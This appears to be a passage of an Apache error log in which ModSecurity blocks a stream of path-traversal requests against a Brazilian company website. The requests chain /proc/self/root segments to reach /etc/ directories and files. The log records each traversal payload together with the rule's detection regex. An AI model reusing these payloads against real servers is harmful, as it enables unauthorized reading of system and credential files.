[Fri Mar 20 08:36:11.211494 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:59308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xK7ninkcc-iUj5ApkMgAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:36:21.704385 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:39580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xNV1pVZ5mVmJwsFM3bQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:36:25.223022 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:44444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xOda6ubjKNq_cu4bbpgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:36:33.121930 2026] [:error] [pid 11167:tid 140411641214720] [client 74.7.243.128:44452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xQfHIg5MgXLBnicP95gAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:36:47.031972 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.243.128:49648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xTwF0L0L-SsrnPo5u-wAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:36:55.052545 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:45838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xVeoXxyEfFpUF8f-HWAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:37:16.462215 2026] [mime_magic:error] [pid 11642:tid 140411582465792] (70014)End of file found: [client 216.73.216.191:56446] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:37:24.345862 2026] [mime_magic:error] [pid 7893:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:34722] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/usr/lib/systemd/user
[Fri Mar 20 08:37:42.107428 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:42614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xhta6ubjKNq_cu4bb-gAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:37:43.440653 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:51906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xhzJ3M9BSuKP7CAYkmAAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:37:47.607921 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:51920] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xizJ3M9BSuKP7CAYknQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:37:59.987386 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:51932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xl_XLqtnMIWvjpaKg5gAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:38:09.086816 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:60024] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xoTJ3M9BSuKP7CAYkuwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:38:31.650434 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.228.61:34204] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0xt_XLqtnMIWvjpaKg8QAAApI"]
[Fri Mar 20 08:38:36.425367 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:56068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xvNa6ubjKNq_cu4bcSAAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:38:37.806199 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:44174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xvda6ubjKNq_cu4bcSQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:38:42.291738 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:44188] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xwl1pVZ5mVmJwsFM3pQAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:38:44.710761 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:55764] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xxPXLqtnMIWvjpaKhBQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:38:53.500423 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:55768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0xzfXLqtnMIWvjpaKhEwAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 08:39:55.763233 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.244.43:50542] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0yC11pVZ5mVmJwsFM3ywAAAEY"]
[Fri Mar 20 08:40:02.991104 2026] [mime_magic:error] [pid 9818:tid 140411666392832] (70014)End of file found: [client 57.141.18.21:33492] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:40:05.949785 2026] [mime_magic:error] [pid 15826:tid 140411574073088] (70014)End of file found: [client 57.141.18.58:33708] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 08:40:11.427984 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:44932] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0yGOoXxyEfFpUF8f-H1AAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:40:13.315383 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:54520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0yHfHIg5MgXLBnicP-aAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:40:14.684032 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.243.128:54524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0yHvHIg5MgXLBnicP-awAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:40:20.718090 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:54532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 